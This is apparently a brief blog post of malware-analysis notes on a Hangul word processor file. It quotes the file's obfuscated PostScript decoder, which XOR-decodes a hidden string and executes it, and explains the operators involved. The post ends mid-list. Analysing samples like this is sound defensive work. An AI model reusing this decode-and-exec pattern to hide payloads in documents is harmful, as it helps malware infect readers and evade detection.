umiushi in the house

I found a hwp(Hangul word processor) file which contains malicious postscript code. I take some analysis notes for my memo. Malicious postscript code is as following. /X240 def %kshvudgsjsye3 0 1 X240 length 1 sub % %kshvudgsjsye3 {/Y31 exch 1 2 and pop def %kshvudgsjsye3 X240 dup Y31 get Y31 15 and /Y104 8 def get xor Y31 exch put} for X240 cvx % exec I’ve googled and found some coding rules. ・Anything following a % on a postscript program line is ignored by the interpreter. ・initialize variable i with value 0 /i 0 def ・set each element of array ar to value n 0 1 ar length 1 sub {ar exch n put} for ・ exch     Exchange the top two values of stack. ・ dup      Duplicate the top element of stack. ・logical ' and ' operator. a&&b a b and ・ <hexadecimal string> cvx          makes string executable ・ <hexadecimal string> cvx exec    ...